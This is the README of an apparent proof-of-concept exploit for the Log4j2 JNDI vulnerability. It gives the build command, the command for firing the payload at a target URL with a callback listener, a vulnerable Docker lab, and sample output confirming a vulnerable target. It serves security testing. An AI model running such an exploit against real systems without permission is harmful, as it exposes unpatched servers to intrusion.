This tool is intended for educational purposes, security research, and controlled test environments only.
Using it against systems without explicit permission is illegal and entirely the responsibility of the user.
This project contains a simple Proof-of-Concept (PoC) exploit for Apache Log4j2 (CVE-2021-44228) vulnerability.
The PoC sends a specially crafted HTTP header with a JNDI LDAP payload to the target.
If the target is vulnerable, it will send a callback to the specified LHOST address.
go build -o exploit exploit.gosudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>-r→ Target URL (endpoint of the vulnerable application)-l→ Your callback listener IP address (the machine running the PoC)
Using the provided Docker vulnerable app:
# Run vulnerable app
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app
# Run exploit
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1Expected output:
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE